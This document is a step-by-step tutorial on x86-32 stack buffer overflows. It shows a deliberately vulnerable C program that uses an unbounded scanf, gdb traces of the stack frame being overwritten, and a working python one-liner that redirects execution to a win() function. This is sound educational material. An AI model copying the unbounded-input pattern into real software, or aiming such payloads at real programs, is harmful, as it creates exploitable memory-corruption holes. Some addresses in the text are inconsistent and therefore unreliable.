Skip to content

Smash the stack

Buffer Overflow refers to a situation when we are able write past the size of a variable , which results in change of data near them , When this type of overflow occur in the stack it is called a stack overflow . With this we can change the value of sensitive variables which are adjacent to the overflow , Also since the return address of a function is stored on the stack we can change the control flow of the program .

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
    /* stack-example.c */

    #include <stdio.h>
    #include <stdlib.h>

    void win()
    {
      printf("You Win ! ");
      exit(0);
    }

    void vuln()
    {
      char arr[0x10];
      scanf("%s",arr);
      printf("Input  : %s",arr);
    }

    int main()
    {
      vuln();
      return 0;
    }

Binary File : stack-example

The above program contains a buffer overflow bug . the size of the character array is 0x10 , since the scanf function does not limit the amount of input read from then user , if it is greater than 0x10 , it will be written after the arr variable . And if we give input large enough we can call the win() by changing the return address of the vuln function .

Note

While debugging with gdb use the binary file provided , compiling the code on your own might change the address of the functions.

1
2
3
4
5
6
7
8
(gdb) x/10i main+11
   0x80484e7 <main+11>: mov    ebp,esp
   0x80484e9 <main+13>: push   ecx
   0x80484ea <main+14>: sub    esp,0x4
   0x80484ed <main+17>: call   0x80484ab <vuln>
   0x80484f2 <main+22>: mov    eax,0x0
   0x80484f7 <main+27>: add    esp,0x4
   ...

When call instruction is executed the address of the next instruction ie, 0x80484f2 is pushed on to the stack and the eip register is changed to 0x80484ab which is the address of vuln function . The return address is stored on the stack so that after the executing of the vuln the execution can be changed to that address , thus the remaining code of main function is executed .

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
    ┌──────────────┐
    │              │
    │              │ <─ ebp 
          ...
    │              │
    │              │
    ├──────────────┤
    │  0x80484f2   │  <─esp   : value pused by the call instruction ( return_address ) 
    └──────────────┘

    (gdb) x/3i 0x80484ea
       0x80484ea <main+14>: sub    esp,0x4
       0x80484ed <main+17>: call   0x80484ab <vuln>
       0x80484f2 <main+22>: mov    eax,0x0
    (gdb) b * 0x80484ed
    Breakpoint 1 at 0x80484ed

    (gdb) c
    Breakpoint 1, 0x080484ed in main ()

    (gdb) x/i $eip
    => 0x80484ed <main+17>: call   0x80484ab <vuln>

    (gdb) x/4wx $esp
    0xffffce20:     0xf7f9f3dc      0xffffce40      0x00000000      0xf7e04286

    (gdb) si
    0x080484ab in vuln ()

    (gdb) x/4wx $esp
    0xffffce1c:     0x080484f2      0xf7f9f3dc      0xffffce40      0x00000000
                       ^
                       |_ return address pushed onto the stack

    (gdb) x/i $eip
    => 0x80484ab <vuln>:    push   ebp

Let's see what is happening in the vuln function .

1
2
    80484ab:          push   ebp
    80484ac:          mov    ebp,esp

These two instruction is called the function prologue . It initializes a new stack frame for the function . The previous ebp is pushed onto the stack and the ebp is moved to the same position as esp .

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
    ┌──────────────┐
    │              │
    ├──────────────┤
    │ 0x0x80484f2  │
    ├──────────────┤
    │ previous_ebp │ ─> ebp , esp   : Stack after the function prologue
    └──────────────┘

    (gdb) x/2i $eip
    => 0x80484ab <vuln>:    push   ebp
       0x80484ac <vuln+1>:  mov    ebp,esp

    (gdb) p/x $ebp
    $1 = 0xffffce28

    (gdb) si
    0x080484ac in vuln ()

    (gdb) x/4wx $esp
    0xffffce18:     0xffffce28      0x080484f2      0xf7f9f3dc      0xffffce40
                       ^
                       |_ ebp is pushed onto the stack

    (gdb) x/i $eip
    => 0x80484ac <vuln+1>:  mov    ebp,esp

    (gdb) si
    0x080484ae in vuln ()

    (gdb) p/x $ebp
    $2 = 0xffffce18                       /* Now ebp and esp points to the top of the stack */
1
2
    80484ae:           sub    esp,0x18
    80484b1:           sub    esp,0x8

These instruction allocates space in the stack for the local variables ( keep in mind that the stack grows from higher address to lower address )

1
2
3
4
    80484b4:           lea    eax,[ebp-0x18] 
    80484b7:           push   eax           
    80484b8:           push   0x804858b
    80484bd:           call   8048370 <__isoc99_scanf@plt>

The lea instruction loads the address of ebp-0x18 ( address of arr array ) to eax register . This address is then pushed on to the stack . If you examine 0x804856b address , it actually points to "%s" . We are going to call the scanf function ( scanf("%s",arr) ) , in x86-32 bit the function arguments are stored on the stack in reverse order so we first push the address of the local variable arr then the address of the "%s" string is pushed .

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
    ┌──────────────┐
    │              │
    ├──────────────┤
    │  0x0x80484f2 │  
    ├──────────────┤
    │ previous_ebp │ <─ ebp
    ├──────────────┤
    │              │
          ...
    │              │
    ├──────────────┤
    │              │<─  eax   : ( ebp ─ 0x18 ) 
    ├──────────────┤  │
    │              │  │
    ├──────────────┤  │
    │  addr_arr    │──        : It is the starting address of arr array
    ├──────────────┤
    │  0x804858b   │ <─ esp   : It points to the format string 
    └──────────────┘

    (gdb) b * 0x80484bd
    Breakpoint 2 at 0x80484bd
    (gdb) c
    Continuing.

    Breakpoint 2, 0x080484bd in vuln ()

    (gdb) x/i $eip
    => 0x80484bd <vuln+18>: call   0x8048370 <__isoc99_scanf@plt>

    (gdb) x/4wx $esp
    0xffffcdf0:     0x0804858b      0xffffce00      0xf7ffcd00      0x00040000
                         ^              ^
         format string  _|              |_ address of arr array
    (gdb) x/s 0x0804858b
    0x804858b:      "%s"

When scanf function is called our input will be saved on the stack since the scanf function reads data till carriage return and there is no limit check for the input , we can give input which is larger than the size of the array . If we give enough input we can actually overwrite the return address .

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
                                           After giving 0x20 A's as input 

    ┌──────────────┐               ┌──────────────┐
    │              │               │              │
    ├──────────────┤               ├──────────────┤
    │  0x0x80484f2 │               │    AAAA      │
    ├──────────────┤               ├──────────────┤
    │ previous_ebp │ <─ ebp        │    AAAA      │ <─ ebp
    ├──────────────┤               ├──────────────┤         ─
    │              │               │    AAAA      │          │
          ...                           ....                 │  0x18 x "A"
    │              │               │    AAAA      │          │
    ├──────────────┤               ├──────────────┤          │
    │              │<─  eax        │    AAAA      │<─  eax  ─
    │              │  │            │              │  │
    ├──────────────┤  │            ├──────────────┤  │
    │  addr_arr    │──             │  addr_arr    │──
    ├──────────────┤               ├──────────────┤
    │  0x804858b   │ <─ esp        │  0x804858b   │ <─ esp
    └──────────────┘               └──────────────┘

The staring of the array is from ebp-0x18 thus giving 0x18 A's we will reach till saved ebp , then next 4 byte will overwrite the saved ebp and the next will overwrite the return address .

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
    (gdb) x/wx $ebp+0x4
    0xffffce1c:     0x080484f2             /* return address before the overflow */
    (gdb) b * 0x80484da
    Breakpoint 5 at 0x80484da
    (gdb) c
    Continuing.
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    Breakpoint 4, 0x080484da in vuln ()

    (gdb) x/4wx 0xffffce00
    0xffffce00:     0x41414141      0x41414141      0x41414141      0x41414141

let's talk about function epilogue .

1
2
    80484da:           leave
    80484db:           ret

The leave instruction is actually

1
2
    mov esp , ebp
    pop ebp

This will move the esp back to the position of the saved ebp thus destroying all the space allocated for the local variable , then pop instruction will move the saved ebp value back to ebp register , it basically deletes the stack frame created for vuln function and restores the stack frame of the main function before the controll is changed to main . The ret instruction will pop the value on top of the stack to the eip register thus changing the control back main ( on normal execution ).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
    (gdb) x/i $eip
    => 0x80484da <vuln+47>: leave
    (gdb) p/x $esp
    $6 = 0xffffce00
    (gdb) p/x $ebp
    $7 = 0xffffce18
    (gdb) si

    Breakpoint 3, 0x080484db in vuln ()
    (gdb) p/x $esp                             /* stack frame of vuln function is destroyed */
    $8 = 0xffffce1c
    (gdb) p/x $ebp
    $9 = 0x41414141
If we continue the program it will segfault since it will try to return to 0x41414141 ( AAAA ) which will be a invalid address , but if we give a valid address it will actually jump to that address when the function epilogue is executed

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
    (gdb) x/i $eip
     => 0x80484db <vuln+48>: ret
    (gdb) si
    0x41414141 in ?? ()
    (gdb) p/x $eip
    $5 = 0x41414141

    (gdb) si

    Program received signal SIGSEGV, Segmentation fault.
    0x41414141 in ?? ()

The address of win function is 0804846b

1
2
(gdb) x/i win
   0x804848b <win>: push   ebp

So let's write the exploit . We have to give 0x1c junk data ( to overflow the arr array ) and then the address of the win function so that the return address will be overwritten with the address of the win() , While giving the address as input we have to keep in mind that data is stored in Little-endian thus we have to give the address in reverse order. We will be using python to generate our crafted input which triggers the bug and calls the win function .

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
(gdb) ! python -c 'print "A" * 0x1c + "\x8b\x84\x04\x08"'  &gt; input       # the output is saved to file inp
(gdb) r &lt; input
Starting program: stack_example &lt; input

Breakpoint 3, 0x080484da in vuln ()
(gdb) x/wx $ebp+0x4
0xffffce1c:     0x0804848b
(gdb) x/2i 0x0804848b
   0x804848b &lt;win&gt;:     push   ebp
   0x804848c &lt;win+1&gt;:   mov    ebp,esp
(gdb) c
Continuing.
Input  : AAAAAAAAAAAAAAAAAAAAAAAAAAAYou Win ! [Inferior 1 (process 32330) exited normally]

Let's run it outside gdb .

1
    python -c 'print "A" * 0x1c + "\x8b\x84\x04\x08"' | ./stack_example
1
    Input  : AAAAAAAAAAAAAAAAAAAAAAAAAAAYou Win !

We have successfully changed the flow of the program .

Practice Challenges